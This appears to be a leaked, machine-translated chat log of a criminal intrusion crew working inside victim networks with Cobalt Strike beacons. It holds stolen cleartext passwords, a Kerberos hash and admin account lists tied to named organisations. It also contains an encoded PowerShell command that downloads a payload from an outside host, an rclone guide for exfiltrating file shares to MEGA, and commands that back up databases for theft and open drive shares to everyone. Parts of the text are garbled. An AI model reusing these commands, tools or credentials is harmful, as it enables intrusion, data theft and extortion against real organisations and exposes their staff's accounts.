797629897A1BB4D09635DFB86D65E6160D4621FBA14E553D40768D8BA73B20B3F05D38D6923B
EECFC23FEDCEE7912A886169F781DD5B971C84C7257CC762FC68DC441B223CEDC016A618C77C
945CB23E574F4702C3702B6E0084402019F26DB11FCFFDECE625BEAA8E0086A58C51908C3A3F
AE656EC95B9AF00A9DBF850490CADDAEE02909EF657CA8F5E0C255D1C79692241553BA8E34A6
B37338A20514096F85E4D17D1A9A89CDA43E330FDC148F0725E09FCD6DE661825F314453418D
18727C89D113CDF8947072CF4C7CC9850070DC0FC7D4F8B5F13AB16151ADB36DA6BB761D5A78
43608AD6D5EB683D03AE6F2B29849FF8FC9AC0472CB4F51BE206FF7BAC9AA67F4ACB438C0149
332A88A39AB66541EE018FCF4F0859A69C07FD06A7D0FC3B736D393575ACF1B1548E4EF03C11
6C0BD49F66561D08B251D999ACC8AD7B087A818A2B329A83EBF9FE912D6C04D25E7B2DE93709
0B10D3DCAC2B606265939967B1164EC63CD582B5F71128DF194A57C750015691F6AB7A5481C1
75033CF61337046E2B253A55A92F21D5A444BE94657FD25DBE868ABFBCD9F2E70DAAD7814D18
49CDEE2EAC0BFF9E4748C3976AF7B573C97F269F84C400605591CD357FB76BF94D2301DB76A4
8612FCCE2C1D0B11F68481B741CBB52B55F4A6F6C4F3DE454E19A4AE41E31E5032940C1C6119
0A0582C179633B1AF2261148D439A356710E33CE603FEC87770775FD1060F0A5DBC510598AC2
344ACFCC2ED05AFA1BAF861A14B18ADABE70DBA7AD73A51EEF91273ADFE6CFBC21823F38B9C6
22E1066884E74A5BA7012FF4F4CE1BFF4CAC6B9C032B8B2758232528F584D95E9B6CA0730F35
2780FCDB09E30769F6F7CBD101EAC32AC1FB6F544B2F85D54CE397F8FE8C664ADE59F8887E09
7FF9B57FFEADFCEF80BE932707EC1B5251D3222B22AFEB43F3ACD3F1AA42B9E267AC8EF62FD1
183DC38BD0570F7E70E4E2A7BFA3467FE79257156B34B952843BB9A4C7ED04ED2053DA281010
FAFD17BAE5C73DE59C3B1A63A6AF7B55C826278E1FEDB1EEABE7B13F4AC8D23A44135E98534E
49DC204D5EE45C8B29E74F1B94FE37F64DD0C08D7E60C1688859024754E8BD7B25ED523AE177
3FB86C6FDEF53C34D302E3E95E7F338B1169AA7CC20791AC2C678D2F407C9821F2B0C028D3F0
2F5CF63EED2F9906B1EEFD7B068873DB53C7D02CFB58DB64B13A2F67FD37F5601965243564D8
390D00BA481B5CB599DBF95D0BC34A60BCBA0914378F308F170A4C205C3EE62B0A2F0ED098C1
94C7E03129D489261CE4472666798914D2E04040FD1BE0D3FA173609AEB28B5C521BCD10F36D
A9CED3A0730C1351435C8C0940F6206BE432CC772B3CB8B8DFE91129D41A9324496BE689DBB0
3564AC936542D1B52B9B6D8C93113AB54BFFE0FCF353E49A6E09E0A479F85449A362C698FA9B
C847F4B395ECEDCC68046229877571B8CCA6CF3C681E8A570BE696722AB590B91A4B46599FD2
32AE2ACDF9272E3D64CD8ADF4DA0BF6FA411945145FB061C4BF72136CF970453A93D09CFBEDE
7EDB8266750800A178D6B604C05A1900EB599D176276BB02CACA86E54BB74A0955C7D7663A40
806069F1E62DFB33ED8F254F8618A23113FA409F6366CD94EBB9DB444F80D1C1C94E8777E2E8
23CD8DCEDDD31579B4D5DDA2A120B2E14E83351428CB6C431D726FC28CAA8C0686C57D919950
48EFD911A7C98DF81B9F2C47062E3C1BF14F183CD1ECD1CCBA97AB143BE8D1A86F7F0F809A38
E9BC6F2BC612FFDDC845053FCFABE6F482214E57AD7FEE71960B84BCCD41BB5950D2C967E3DE
F10AEFF3C5FEB106CE5B19C4DCCA7E5FE148B0879CBAF5A5828592D82F8C09AE54E9005C92A9
677FA59B87EB3E9FF753CFB6EF022E272B1B064090A9AF0DD281A332AA5AB21E3B01024840D0
87C912B42B869198FB579E81CF8FF8E6F
SamAccountName : Pwwadfssvc
DistinguishedName : CN=PwwAdfs Svc,OU=Users,OU=AuthManagement,DC=gpj,DC=loc
ServicePrincipalName : host/STS.GPJ.COM
``````
[RESULT] Username: Administrator (built-in)
[RESULT] Changed: 2015-06-29 09:18:32
[RESULT] Password: DdhGmek/pc
[RESULT] Username: install
[RESULT] Changed: 2015-06-29 09:46:46
[RESULT] Password: rt/98740/pc
[RESULT] Username: Lack
[RESULT] Changed: 2014-10-06 09:45:54
[RESULT] Password: RT+farbe
if there is time to work with the nessession arrived)ah, then delete all but one dead ones with a ping in a few hoursdid you have dead ones if there are[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=XSDfk8yFdwtBYX9dF) ?with you what happens to mine?ok, go back to the other 14 tasks closed without a note? great) in the root of the rdmi appeared) ok if there will be rdmi then ok try to run dlla 17 will not work? ok take a secondary server with a session to 15 makstam so much? if more than 10 is ok? all mapping or whatever? no i just picked up disks ts. I'll check if the balls are done? + in short, I'll work in a shared coba, maybe delete 50? it looks like I have a problem with the coba. run a dll from a user7 to him the session flew. he tried to throw it to me - no luck. then he threw it in the coba, where we get sessions today. I tried to dump it on myself - again no luck. I restarted cobalt at 7 o'clock. I'll try the others. I went in order and stopped at the first one and masked the rest.no use, llvm and both checkboxes checked - no session anyway, i made a dll in bilder, it copied, i ran it, it disappeared, but no session...i'll give you access to bilderado dll maybe better, mine will not raise sessionokeid.bild left? ok, let's do[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=3wWnzihjHwbAKDKm7) maybe it is. stalin says "hz" ``
Volume in drive \10.0.61.17\c$ has no label.
Volume Serial Number is F476-EA6A
Directory of \10.0.61.17\c$
08/22/2013 08:52 AM PerfLogs
12/08/2020 05:22 PM 204,192 pl64.dll
03/29/2019 01:30 PM Program Files
12/09/2020 07:42 AM Program Files (x86)
12/09/2020 08:06 AM 42,606,592 redcloak.msi
03/06/2015 10:26 AM sysprep
06/13/2019 02:08 PM Users
07/25/2020 07:12 PM Windows
10/26/2018 12:36 PM Zabbix_Agent
``but I don't see a note in these, ok, the dll could have stayed since the sessions were from a process and the dll can't be killed```
Volume in drive \10.0.61.87\c$ has no label.
Volume Serial Number is 6847-A1AE
Directory of \10.0.61.87\c$
09/14/2012 12:22 PM 5,210,976 445622_intl_x64_zip.exe
03/23/2016 01:35 PM 1,435,680 adksetup(1).exe
06/03/2011 12:54 PM 119 FIREWALL
12/10/2020 07:07 AM 0 KBSERVICE.SHUTDOWN
06/03/2011 01:10 PM 924,544 keyManagementServiceHost.exe
11/19/2014 04:57 PM 434,152 office2013volumelicensepack_x86_en-us.exe
07/13/2009 07:34 PM PerfLogs
12/08/2020 05:37 PM 0 pl64.dll
03/29/2019 01:30 PM Program Files
01/16/2018 04:10 PM Program Files (x86)
05/21/2020 09:53 AM Users
01/14/2019 11:33 AM Win7AndW2K8R2-KB3191566-x64
12/08/2020 06:34 PM Windows
07/02/2012 02:32 AM 5,084,750 Windows6.1-KB2691586-v9-x64.msu
10/21/2013 12:45 PM 7,769,979 Windows6.1-KB2885698-x64.msu
10/29/2018 02:49 PM Zabbix_Agent
``````
Directory of \10.0.50.71\c$
08/03/2017 01:19 PM B5465 P639 Firmware
08/03/2017 01:18 PM 223,498,304 B5465 P639 Firmware.zip
11/03/2017 09:55 AM batch
08/17/2017 01:43 PM Canon_backups
09/12/2016 04:34 AM logs
02/24/2018 06:04 AM PerfLogs
12/08/2020 05:19 PM 204,192 pl64.dll
11/03/2017 09:58 AM Printer_Exports
03/29/2019 01:29 PM Program Files
12/09/2020 02:51 PM Program Files (x86)
10/24/2016 07:12 AM sysprep
10/05/2020 02:13 PM Users
11/21/2020 08:29 PM Windows
10/26/2018 08:11 AM Zabbix_Agent
07/16/2018 01:39 AM 2,423 __PatchLink0026.cab
``````
Volume in drive\10.0.61.117\c$ has no label.
Volume Serial Number is D242-6D7F
Directory of \10.0.61.117$
11/01/2016 10:32 AM 7,789,336 ControlNowAgentSetup.exe
09/12/2016 04:34 AM Logs
05/28/2018 02:16 AM PerfLogs
12/08/2020 05:18 PM 204,192 pl64.dll
03/29/2019 05:54 PM Program Files
12/09/2020 10:18 AM Program Files (x86)
12/09/2020 08:06 AM 42,606,592 redcloak.msi
10/26/2017 01:43 PM sysprep
01/29/2019 04:13 PM Users
11/22/2020 08:30 PM Windows
10/26/2018 09:41 AM Zabbix_Agent
3 File(s) 50,600,120 bytes
8 Dir(s) 82,381,557,760 bytes free
``at the root of....``
12/08/2020 05:01 PM 204,192 pl64.dll
``dll remained+either raised or not attracted. let me ask stalin - his server was ``SHAREP-WEB1: 10.0.61.53
Volume in drive \10.0.61.53\c$ has no label.
Volume Serial Number is F476-EA6A
Directory of \10.0.61.53\c$
02/09/2015 11:34 AM inetpub
08/22/2013 08:52 AM PerfLogs
12/08/2020 05:01 PM 204,192 pl64.dll
03/29/2019 05:54 PM Program Files
10/08/2019 10:19 AM Program Files (x86)
02/11/2015 09:59 AM root
02/05/2015 09:42 AM sysprep
05/24/2017 01:29 PM Users
07/26/2020 07:12 PM Windows
1 File(s) 204,192 bytes
8 Dir(s) 68,786,823,168 bytes free
``[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=ufef3u2v4oequfuwE) ok[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=jukNHRbyzyYWcqAZ2) there's nothing on these servers at all, no ball or disk from all serversdid you get them all? and take them off in general \host\c$ I'll check this dir \\\host\c$\readme.txt >> report.txt returned files
10.0.53.58
""
10.0.51.45
""
10.0.254.22
""
10.0.53.57
""
10.0.53.54
""
10.0.61.54
""
10.0.53.53
""
10.0.53.56
""
10.0.61.86
```
there's no balloon here? and it's being reportered on the 174 servers nowgm, right now) run it under the admin and change the host in a loop or something like thatmake a batkin with a loop in it
dir \\host\\c$/readme.txt >> report.txt If you manually go through 200 servers, you'll get boredFINIIS1 - pings on nothing opensMANITOU - note thereADMINDC5 - note thereADM-RADIUS1 - note thereESPAPP3 - does not respond `` ``
The request will be processed at a domain controller for domain main.crispregional.org.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator Allscripts_Admin allscripts_services
AllscriptsSQL amhs-admin ashleys
blove dragon helpdesk
htservice jwashburn1 MBAM-RW-SVC
meditech meditech-admin mhiers
nodom pbodrey rlagrone
rthomas smaxwell spf_svcs
tcoppedge
The command completed successfully.
[+] received output:
The request will be processed at a domain controller for domain main.crispregional.org.
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
Administrator rthomas
The command completed successfully.
[+] received output:
The request will be processed at a domain controller for domain main.crispregional.org.
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
braccosupport
Domain Admins
meditech
meditech-admin
The command completed successfully.
beacon> shell net localgroup "administrators"
[*] Tasked beacon to run: net localgroup "administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
admin
Administrator
MAIN\Domain Admins
The command completed successfully.
``Then throw the actual information in the confab, so that everything was in front of my eyes, no, not yet? Yes, I'm still doping armas. So we'll start soon. So what.octamovemovement wentprinjoin @user8 still, still quietly put ``
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JENsemx0NFpld2U2bXI0ZTJMRTlkdzllRUNFSkhiUmxZY0NFPTA7CiRfaWQ9J1IzUFgzMmNkVmNIRE1IODd2MzBURWRXallaQTl2SzhWVlJpUjN6dVUnOwokX3VybD0naHR0cDovL3dpZGVpby5jb20vYXNzZXRzL2Nzcy9ib290c3RyYXAubWluLmNzcyc7CnNsZWVwIDEyOwokc3N3ID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuU3RvcHdhdGNoOwokZWMgPSAkZXJyb3IuY291bnQ7CmZ1bmN0aW9uIGI2NGUgKCRzdHIpIHtpZiAoISRzdHIpIHsgJHN0ciA9ICcnIH07cmV0dXJuIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkc3RyKSk7fQpmdW5jdGlvbiBiNjRkICgkc3RyKSB7cmV0dXJuIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHN0cikpfQpmdW5jdGlvbiBzcHIoJGEsICRwcykgewokV0MgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50Owokd2MuSGVhZGVycy5BZGQoJ2FsdC1zdmMnLCAibWE9JChHZXQtUmFuZG9tIC1NaW5pbXVtIC05ODc2NTQzIC1NYXhpbXVtIDk4NzY1NDMpLGgxLVEkKEdldC1SYW5kb20gLU1pbmltdW0gMTAwIC1NYXhpbXVtIDkwMCk9YCI6JChHZXQtUmFuZG9tIC1NaW5pbXVtIDQwMCAtTWF4aW11bSAxMDAwKWAiOyBtYT0kKEdldC1SYW5kb20gLU1pbmltdW0gLTk4NzY1NDMgLU1heGltdW0gOTg3NjU0MykiKTsKJHdjLk
``full''
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ANgAwADgAaQBzADEAVABLAEUANgA5AHIAegBDAEgAdQB4AEQAOABBAFAAbABXAEUAUQBWAG0ATABJAHEAbwBmAFYASwBkAG8AMQBhADcAawAnACkAKQA7AA==
Give me a load of the stuff you don't have...put the dlluwas supposed to be there yet. did it come?[ ](https://mediaeveryone.com/channel/general?msg=2K7rdb6f6WThpRqdB) ok if it doesn't come in 30 min, you'll write 30 min. put@user4 give me more silk code[ ](https://mediaeveryone.com/channel/general?msg=tXPbfeLk4E8h253QE) add me to the confutaq still 1 help @user8 he has a fat network there would not want to lose it, build a dll from kobyzhivoy there) my it?TomHolzerFordwhat's his? ask my guys if it's theirs. I'll tell you what's mine... I'm confused, yours is not)((I mean @user4)
urlbig.com:443vrue, found yours now give others do not exist think about how you'll act just run your eyes over the Mapuhoto not worthwhile@user9 write out a plan to close by roadmap7[ ](https://mediaeveryone.com/channel/general?msg=R3BrByJd5Xknit5Jx) under whom? which did not have time? if so, then the conf is not me yesterday there was another - ballymoregroup.com if you can get it back, I can continue with it, or user8 help with 26 trustsconf under it there was another one, but it almost immediately offsolved - did not have time[ ](https://mediaeveryone.com/channel/general?msg=vr32eeF23pzvdXTJo) heremb I will now launch you there in general those with whom I workedwill see what to give me)no. but for today, yes)are you done with him? no. we were here with the router again poking around and you started at 6?[ ](https://mediaeveryone.com/channel/general?msg=9pJzNgC67kaNguRSm) writing, yesterday the last one at the end of the day went to the offethese means to sit idle?there is no active guys, I'm not a telepath, if you sit without work write write that people are working in the input sessions who like yesterday are still dead why sit silently I also do not have a live in the input cobb is there new? or after 3 am or until 6 pm you know the timing in my grid kst only 8 am @user9 if finished take another network to work) ah) I will throw there and build before closing) so ah close.we are not closing now why? @tl1 add us to @user9 in the confab, if it's not difficultselfspin.com sorting of servers and other information in the confab.hiB corbel.com all ready for closure then the plan for today is: 2 people who have already taken YES work in the same networks and preparing to close, the rest while lifting the rightsDa, but not all came up All alive, in sound mind and health?HiTo all helloDa)morninG) to all goodnightTo all without misunderstandingTomorrow i.e. todayHappyTo all until tomorrow)hopefully in the eveningTo 6 khoroshoda, two?without "probably a normal grid" right? total 2 networks with Dada, also Dada and dll running `MM-LIB` host where the dll stuck rolling check and then staskun at the stage of work with vpnom it was in lrhstuck and did not solve[ ](https://mediaeveryone.com/channel/general?msg=Xj8qmsWoqKomTqCah) how did you solve?give the hostname also yes and dll is running? well i had at least so it was somysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysm's was there yes, looking for edtam xp) ohohohojitwinds you ten tomorrow will solve these cases get such ``
beacon> shell net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER
[*] Tasked beacon to run: net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER
[+] host called home, sent: 95 bytes
[+] received output:
System error 384 has occurred.
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
``boys are part of a group of hp adminstrusts will scour tomorrow in the current one or trastaherstech.com, fishusa.com, holzerford.com - removed adinfo, kerbs, EA YES. all sessions are off.this is wherealloypolymers.com
>description: password rbuilder
>description: Generic GroupWise account for Adhesives. Password - pword
>description: Password is pword.
>description: Pword-flas21a. Deco 1
>description: The password is waglobal2014 Password does not expire
>description: For Trackit SQL passqord is trackit114
>description: The service account for DCWAS08 Execel Password is VantgagePoint
``@user8 here's some food for thought for tomorrow if the session doesn't die[ ](https://mediaeveryone.com/channel/general?msg=A24quWh36NdPwR2Px) COGNOSPD.korbel.com
dcsync was taken off, maybe the lab, now in slip, waiting for commands
`wilsonart.com'.
28 trusts, minus duplicates and quarantines - 7
7 trusts removed from hell, two trusts and the current domain removed from the kerbs@user9 say his hostnamecorbel.com
There is a YES
run the dll on the far server
found sphere and creeds
found edr and krediSnatched the AD, lifted the system, no kredi to move on, with nyah kerb kredi given for decryption.are there dll running on the servers and so yes to me exactly the network interests with YES which we will close tomorrowwrite reports on workMany of 2826 trusts)are you many left?+++ alive? you about the zealot do not forget? my keyloggers empty (there is nothing empty) they just work with shul and sometimes write to each other keyloggers have not checked? yes shul there all in #waterway-com uploading backups mail finance admins + deal with shul so what do you have?so the sooner we check everything for tomorrow the sooner we go to bedtoday we're closing 2 grids so the sooner we work the sooner you go hometodaytodaytodaytodaytodaytodaytoday by 6 and today we need to prepare everything for tomorrow i understand you're tiredtodaytoday we're closing the rt or till 00 work @tl2 @tl1 same, backups in water what are you busy doing?i did not try it, that's why i wrote it like with rdp)) try it without rdp? it pours very fast because of the high compression
now there is no need for any 7za and unzipping the mega! everything is very quiet and unnoticeable!
download rclon from the off-site. rclon.exe put it in the right directory, then everything according to the manual. I did everything through the rdp
You register a mega, choose it from a huge list, which rclon provides us. rclon quietly connects to the mega and makes a clone of what you need. you can at least the whole fs. it downloads everything through rclon, so the download speed is high.
Here's the guide. It's simple
https://rclone.org/mega/
next command to download
rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
remote:NT - change only this.
"remote" is the name of your mega.
"NT" is your directory in the mega where it will be downloaded to, if it doesn't exist, it will create it itself.
example
rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
``https://rclone.org/если requires some amount of data to be uploaded''.
8. Backup database
sqlcmd -S localhost -E -Q "BACKUP DATABASE name TO DISK='C:\PerfLogs\name.bak'"
for remote/other local server change localhost to ip,port
alternatively localhost,%port% (see netstat)
``````
7. Output all tables of a specific database
sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W
``````
with size in megabytes
sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;"
``````
1. Display all databases on the server in kmd
sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
As soon as you jump into the process you look at the databases list by default there is sqlcmd tool installed on the server it has direct access to the data to backup the sqlwriter, sqlsrv processes on the sql server) workedI press the bind nothing happens what? @tl1Yt hf,jnftn&https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/tools/1vpn check thereupon there is access to the domain no load for egoghbdtnHi, our evo vpn has fallen offHiHiHiWell, now checking did you check wilson? did the file appear on the unshared armas? flew home where we have @user9? how unexpected and niceaaa we miss our family as much as you)missed you?)helloTo all helloDo you want me to ask everyone in the confuskinu to the appropriate confuaga, I'll dig in the records of strangers to see what there may be interestingthem the difficulty, as I understand from @user7 is to find a sphere / backups? well, let's finish today probably? there he is small aha)as you see - norrivet good evening! @tl1 not yet?
BACKUP$
BACKUPDVR$
CHIBACKUP2020$
CLEBACKUP$
CLEBACKUP2020$
DVRBACKUP2020$
DVRNEWBACKUP20$
KCBACKUP2020$
KCNEWBACKUP2020$
NEWBACKUPCHI$
NEWBACKUPCLE$
``````
\BLAUERPC\D$
\DRB2\Archive
\\{\DRB2\Backup
\\Replication
\\GKELLER/G$/Backup
\\GKELLER/G$/WW2k1/IT/SolarwindsBackups
\REPORTING\D$\SQLBackup
\\Data\AKPRO_Data\BACKUPS
\WW2K1\F$/Backup
\WW2K1\F$Data\AKPRO_Data\BACKUPS
\\{\WWSQL\S$\SQLBackup
``.``WATERWAY\blauer 11915Admin2179!````
http://192.168.100.247/AXIS_ACCC8ECFBF99,http://192.168.100.247/,11/22/2019 1:44:27 PM,13218925467505127,root,Waterway99!
WATERWAY\mharper LoveUnit14
``Good evening. we're here)))))Thank you for such flattering words, and @tl1 is also a pleasure to work with
I wish I could find some red words, but I'll just respond with... an anecdote!
A pentester is walking through the desert, he wants sex, he meets a genie, and he asks him "What do you want, traveler?"
-Fucking, says the pentester.
And then out of nowhere appears a bunch of all sorts of spheres without creed, not decrypted hashes on kmd5, nets in which the domain is not visible and a billion all kinds of avers
-Get the fuck out of here,‖ jinny answers. -Yes, the last thing I wanted to say, while you're resting, think about whether any of you want to take additional offline courses through the official pentester refresher course.
CEH, OSCP and the like
So have a nice holidays) see you next year) Likewise) We are also happy to work with you )From us too we want to say thank you, it is a very useful experience, especially in a short period of time. My head is boiling, but it is interesting) Happy New Year to you = ) )In short - all are good) the most difficult passed) further will only be more interesting) from my experience, I say that in comparison, you are growing very fast on the technical part, small zatupy have all, and this is normal
But next year we'll get to a completely different speed, start parallel technologies, dig nixes
i for my part and @tl1 and the development team will also be preparing some cool stuff for you
hope i am not mistaken)and for a very short time by the standards of junior pentests we have come a long way from 0 to the current cases with the flag -nomutex so i want to share my impressionsthen see you soon) backups in work, the backups are working and i'll be back up by 21 til next tuesday. i will be back up by 21 tuesday but report here now please = )
so @tl1 knows what's the plan)
who can today - pull up to 21
if no one can, go on vacation
I don't know anything.)
At @tl1 let's ask)last day also in case of success? >last case on the last dayvono, of course, no problem, if anyone else can not - say, today "at will" with bonuses in case of success of the work itselfvtl1 we'll have a day of groundhogs at me at all
I just looked at the calendar for the first time in a week and a half or two I will be able to communicate, but not in the office, in the evening I fly away
I was planning to go on holiday today, so the tickets are bought(
i think the guys will cope with a small network without me a good question, i think to finish some last case on the last day =)and for what, like we said on holidays go away ... friends, today's case comes to an end, as the final touches to backup will be solved, the server and workstation checked - all go to rest
@tl1 said before leaving that we're going to 21, have time to rest?[ ](https://mediaeveryone.com/channel/general?msg=FtyaEbnGv588f4knR) Well, another plus exeshnik is a lot of threads. icacls a long teamdobavliv grunt fullpo therefore exeşnik seemed easier) there batnick also swore - and Timlid2 said, I threw you in private, something about regulars, etc.so polis are more swearing ehena exe and scatterbatnik easier than ehesut same in order to scatter on armieswhy not batnick?and build me, in laba runningasdavayne, if grunt full works fine then add it to the exeştnik - minute and so and so ran from the admin? i checked in the laba batnick - no problem with this no - vorkgruktachka outside the domain?
Node Name: DESKTOP-5SMSDNR OS Name: Microsoft Windows 10 Pro OS Version: 10.0.18363 N/A OS Manufacturer: Microsoft Corporation OS Settings: Isolated Workstation OS Build: Multiprocessor Free Registered Owner: User Registered Organization: Product Code: 00330-80000-00000-AA618 Installation Date: 09/16/2020, 13:38:44 System Boot Time: 12/22/2020, 1:54:35 System Manufacturer: Gigabyte Technology Co. System model: G31M-ES2L System type: x64-based PC Processor(s): Number of processors - 1. [01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~2834 MHz BIOS version: Award Software International, Inc. FF, 10/13/2009 Windows folder: C:\Windows System folder: C:\Windows\system32 Boot device: \Device\HarddiskVolume1 System language: ru;Russian Input language: ru;Russian Time zone: (UTC+03:00) Moscow, St. Petersburg Full physical memory: 4,085 MB Available physical memory: 715 MB Virtual memory: Max size: 5,621 MB Virtual memory: Available: 828 MB Virtual memory: Used: 4,793 MB Swap file location: C:\pagefile.sys Domain: WORKGROUP Network login server: \DESKTOP-5SMSDNR Patch(s): Number of installed patches - 12. [01]: KB4586878 [02]: KB4513661 [03]: KB4516115 [04]: KB4517245 [05]: KB4521863 [06]: KB4561600 [07]: KB4576751 [08]: KB4576754 [09]: KB4577670 [10]: KB4580325 [11]: KB4586863 [12]: KB4592449 Network adapters: Number of network adapters - 2. [01]: Qualcomm Atheros AR8131 PCI-E Gigabit Ethernet Controller (NDIS 6.30) Connection Name: Ethernet DHCP enabled: Yes DHCP server: 192.168.88.1 IP address [01]: 192.168.88.248 [02]: fe80::d935:55:e14f:fe49 [02]: VirtualBox Host-Only Ethernet Adapter Connection Name: VirtualBox Host-Only Network DHCP enabled: None IP address [01]: 192.168.56.1 [02]: fe80::f4c1:748b:225c:98a0 Hyper-V Requirements: Virtual machine monitoring mode extensions: Yes Virtualization enabled in firmware: Yes Layer 2 address conversion: No Data execution prevention available: Yes
``vin10version os etc.'' Where do you run it?
System error 1332. Matching between user names and security identifiers has not been performed.
``there - where?'' without grunt full, it's just going the wrong way.
C:\Users\awilson\Desktop>1.bat
C:\Users\awilson\Desktop>net share c=c: /grant:everyone,full
c was shared successfully.
C:\Users\awilson\Desktop>net share d=d: /grant:everyone,full
d was shared successfully.
C:\Users\awilson\Desktop>net share e=e: /grant:everyone,full
The device or directory does not exist.
More help is available by typing NET HELPMSG 2116.
C:\Users\awilson\Desktop>net share f=f: /grant:everyone,full
The device or directory does not exist.
More help is available by typing NET HELPMSG 2116.
C:\Users\awilson\Desktop>net share g=g: /grant:everyone,full
The device or directory does not exist.
More help is available by typing NET HELPMSG 2116.
NET share A=A: / grant:everyone,full`` you have a space there so lol)`` the same principle read a file that doesn`t exist so what do you want?
C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: / grant:everyone,full Unknown parameter /. Syntax for this command: NET SHARE shared_resource shared_resource=disk:path [/GRANT:user,[READ | CHANGE | FULL]] [/USERS:number | /UNLIMITED] [/REMARK: "text"] [/CACHE:Manual | Documents| Programs | BranchCache | None] shared_resource [/USERS:number | /UNLIMITED] [/REMARK: "text"] [/CACHE:Manual | Documents | Programs | BranchCache | None] {shared_resource | device_name | drive:path} /DELETE shared_resource \\computer_name /DELETE For more help, type NET HELPMSG 3506. C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: /grant:everyone,full System error 1332. The mapping between user names and security identifiers has not been done.
I ran the lead on our office computer. win10what was the environment? So it was in the batch file and it was telling me "I can't match something to something" I don't know what it was telling me?
/grant:everyone,full
```
it's not working at all ```
/grant Everyone:F /T /C /Q
/grant:everyone,full
```
did you take this into account? didn't you make this one?[ ](https://mediaeveryone.com/channel/general?msg=tTo8qqSowdwhX3xRy) not this one?[ ](https://mediaeveryone.com/channel/general?msg=BgFFK5gy8Bs3kp6Kx) what was the batik and the exechanger? I won't answer, you'll get scolded, did you make the batik and then the exechanger by any chance save it?good question, I do not know which of the confines of the wrote it guys who remember where @tl2 wrote about the driver balls, please copy them to health host specified in , the second argument) mapped only c$ balls thank you) `` ``
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:28> share-mapper KCNEWBACKUP2020
[*] Attaching c$ in KCNEWBACKUP2020 host
[*] Tasked beacon to run: net use *\\\KCNEWBACKUP2020\c$ /PERSISTENT:YES
[*] Tasked beacon to run: net use
[+] host called home, sent: 115 bytes
[+] received output:
Drive Z: is now connected to \\KCNEWBACKUP2020\c$.
The command completed successfully.
[+] received output:
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK Z: \KCNEWBACKUP2020\c$ Microsoft Windows Network
The command completed successfully.
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:51> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK Z: \KCNEWBACKUP2020\c$ Microsoft Windows Network
The command completed successfully.
``Check''.
#ShareMapper.cna
#Author: @noname
#no desc
beacon_command_register("share-mapper", "shares attacher",
"Syntax: share-mapper [hostname1,hostname2,hostname3,hostname4]");
alias share-mapper {
if ($2 is $null) {
berror($1, "Need hosts!)
} else {
@hsts = split(",", ["$2" trim]);
foreach $entry (@hsts) {
blog2($1, "Attaching c\$ in $entry host");
bshell($1, "net use * \\\\$entry\\c\$ /PERSISTENT:YES");
}
bshell($1, "net use");
}
}
``For fuck's sake,``
already threw it here, not alive? if not - to reopen then @tl1 ok?
$krb5tgs$23$*sqlman$epctech.com$MSSQLSvc/sqlsrv02.epctech.com ydkwicd
